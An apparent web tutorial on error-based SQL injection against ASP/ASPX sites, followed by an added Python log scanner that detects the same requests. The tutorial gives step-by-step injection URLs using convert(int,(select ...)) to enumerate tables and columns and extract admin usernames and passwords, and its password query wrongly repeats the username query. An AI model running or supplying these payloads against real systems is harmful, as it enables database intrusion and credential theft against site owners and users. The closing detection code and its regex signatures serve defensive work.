Hacking ASP/ASPX Websites

ASPX injection is similar to PHP-based SQL injection. But here, we don't use queries that contain order by, union select, etc. Instead, we trick the server into responding with the information we need. It is an error-based injection technique: we get the information in the form of error messages.

Step 1: Find Out A Vulnerable Link
First, we need to find a vulnerable asp/aspx link, which looks like

When I browse my actual link, I get the page as shown in the figure.

Step 2: Checking For Vulnerability

As in PHP-based injection, we test for the vulnerability by adding a single quote at the end of the URL.

If it gives an error similar to the following, then our site is vulnerable to SQL injection.

In asp/aspx-based injections, we need not find out the number of columns or the most vulnerable column. We directly find out the table names and column names, and then we extract the data.

Step 3: Finding Out The Table Names.

http://www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top 1 table_name from information_schema.tables))

The above request executes the second query and retrieves the first table name from the database. The Windows server can't convert the character value into the int data type, so we get an error, as shown in the following figure, from which we can read the first table name.

But this may not be the desired table for us. So we need to find out the next table name in the database.

For that, we will use the following query.

http://www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('first_table_name')))

Replace first_table_name with the actual table name we got above.

Now we will get the second table name as shown in the figure. If we still don't get our desired table, we continue the procedure until we get the desired table name. Now the query looks like

http://www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('first_table_name','second_table_name')))

Replace first_table_name and second_table_name with the table names we got in the above steps.

Step 4: Finding Out The Columns

Now we have the admin table, so we need to find out its columns.

http://www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='admin_table'))

Replace admin_table with the table name we got. In our case, it is “vw_system_admin”.

If the first column is not related to our desired column names, then follow the same steps as in Step 3.

http://www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='admin_table' and column_name not in ('first_column_name')))

Replace first_column_name with the column name we got.

Step 5: Extracting The Data

After finding out all the columns, we need to extract the data such as user names and passwords.

For that, we use the following query

For user name,

http://www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top 1 admin_username from admin_table))

 

For password,

http://www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top 1 admin_username from admin_table))
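Seen from the defender's side, the requests in Steps 2 to 5 leave a recognizable trail in the web server log. The following is an added example, not code from the original post: it scans IIS-style log lines for the trailing-quote probe that returns a server error and for the convert(int,(select ...)) pattern. The field layout, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample lines. Assumed field order:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2024-05-01 10:00:01 203.0.113.7 GET /gallery.aspx id=10 200
2024-05-01 10:00:05 203.0.113.7 GET /gallery.aspx id=10' 500
2024-05-01 10:00:09 203.0.113.7 GET /gallery.aspx id=10+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables)) 500
2024-05-01 10:00:14 203.0.113.7 GET /gallery.aspx id=10%20and%201=CONVERT(int,(select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20('t1'))) 500
2024-05-01 10:00:20 198.51.100.4 GET /gallery.aspx id=11 200
2024-05-01 10:00:31 198.51.100.4 GET /search.aspx q=convert+pdf+to+int 200
"""

# A subquery forced through an int conversion, and reads of the schema catalog.
CONVERT_SUBQUERY = re.compile(r"convert\s*\(\s*int\s*,\s*\(\s*select\b")
SCHEMA_READ = re.compile(r"information_schema\.(tables|columns)")
QUOTE_PROBE = re.compile(r"'\s*$")  # parameter value ending in a single quote

def normalize(query: str) -> str:
    """URL-decode twice (catches double encoding), lowercase, collapse whitespace."""
    for _ in range(2):
        query = unquote_plus(query)
    return re.sub(r"\s+", " ", query).lower()

def classify(query: str, status: int) -> list[str]:
    """Return the names of the signatures that match one logged request."""
    q = normalize(query)
    hits = []
    if CONVERT_SUBQUERY.search(q):
        hits.append("convert-subquery")
    if SCHEMA_READ.search(q):
        hits.append("schema-enumeration")
    # A lone quote is only interesting when the server answered with an error.
    if status >= 500 and QUOTE_PROBE.search(q):
        hits.append("quote-probe-error")
    return hits

def scan(log_text: str) -> dict[str, list[tuple[str, list[str]]]]:
    """Group matching requests by client IP: {ip: [(timestamp, hits), ...]}."""
    findings = defaultdict(list)
    for line in log_text.splitlines():
        if not line or line.startswith("#"):  # skip W3C header directives
            continue
        date, time, ip, _method, _stem, query, status = line.split()
        hits = classify(query, int(status))
        if hits:
            findings[ip].append((f"{date} {time}", hits))
    return dict(findings)
```

Several convert-subquery hits from one client in a short window, each with a longer "not in" list, indicate the table-by-table enumeration described in Step 3.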

 
